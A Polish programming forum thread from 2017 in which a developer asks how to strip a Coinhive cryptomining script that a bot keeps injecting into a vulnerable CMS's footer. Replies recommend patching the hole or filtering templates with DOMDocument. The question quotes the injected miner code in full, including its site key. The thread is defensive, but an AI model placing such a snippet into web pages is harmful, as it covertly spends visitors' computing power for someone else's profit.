• Najnowsze pytania
  • Bez odpowiedzi
  • Zadaj pytanie
  • Kategorie
  • Tagi
  • Zdobyte punkty
  • Ekipa ninja
  • IRC
  • FAQ
  • Regulamin
  • Książki warte uwagi

Blokowanie skryptu Coinhive.com po stronie serwera

VPS Starter Arubacloud
0 głosów
227 wizyt
pytanie zadane 7 grudnia 2017 w Bezpieczeństwo, hacking przez Sisa Bywalec (2,580 p.)

Hej,

Dostałem do napisania skrypt, który ma wyszukiwać linijkę z kodem do koparki i ją usuwać. Operacja ma się odbywać po stronie serwera. Strona ma autorski, ale w jednym miejscu dziurawy CMS, przez tą dziurę właśnie wrzucany jest rozszerzany plik np. stopki o wartość z kodem JS (problem z tym, że data modyfikacji pliku się nie zmienia, zmienia się tylko rozmiar pliku - przypuszczam, że to jest bot, bo za każdym razem jak usunę tą linijkę jest dopisywana gdzieś indziej zero w tym zależności, przez FTP też się nie łączy bo w logach jest pusto) .

<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('wALyjE7Fpru44rvyf51ON7lZbRuPFNj2');
miner.start();
</script>

Pytanie brzmi jak do tego podejść? Puścić skrypt, który wyszuka i usunie dopisany kod, czy lepiej dołączyć plik JSa, który wykryje że jest uruchamiany Minner i go zablokuje?

1 odpowiedź

0 głosów
odpowiedź 7 grudnia 2017 przez Comandeer Guru (604,780 p.)
Jedynym sensownym rozwiązaniem w tym wypadku jest usunięcie luki a nie robienie takich kombinacji alpejskich.
komentarz 7 grudnia 2017 przez Sisa Bywalec (2,580 p.)
Chodzi o to, że strona będzie pisana na nowo (bo nowe strony są już odporne na te ataki), więc dostałem do napisania skrypt który tymczasowo się tym zajmie do czasu pojawienia się nowej wersji strony.
1
komentarz 7 grudnia 2017 przez Comandeer Guru (604,780 p.)

Jeśli strona ma jakiś system szablonów, to można obrobić szablon przed wyświetleniem np. przy pomocy DOMDocument i wyciąć rzeczy, których nie chcemy.

Podobne pytania

0 głosów
0 odpowiedzi 103 wizyt
pytanie zadane 19 września 2016 w JavaScript przez redstar1 Bywalec (2,200 p.)
–1 głos
2 odpowiedzi 1,010 wizyt
pytanie zadane 16 kwietnia 2016 w PHP przez niezalogowany
0 głosów
0 odpowiedzi 629 wizyt

92,974 zapytań

141,938 odpowiedzi

321,180 komentarzy

62,301 pasjonatów

Motyw:

Akcja Pajacyk

Pajacyk od wielu lat dożywia dzieci. Pomóż klikając w zielony brzuszek na stronie. Dziękujemy! ♡

Oto polecana książka warta uwagi.
Pełną listę książek znajdziesz tutaj.

Wprowadzenie do ITsec, tom 2

Można już zamawiać tom 2 książki "Wprowadzenie do bezpieczeństwa IT" - będzie to około 650 stron wiedzy o ITsec (17 rozdziałów, 14 autorów, kolorowy druk).

Planowana premiera: 30.09.2024, zaś planowana wysyłka nastąpi w drugim tygodniu października 2024.

Warto preorderować, tym bardziej, iż mamy dla Was kod: pasja (użyjcie go w koszyku), dzięki któremu uzyskamy dodatkowe 15% zniżki! Dziękujemy zaprzyjaźnionej ekipie Sekuraka za kod dla naszej Społeczności!

...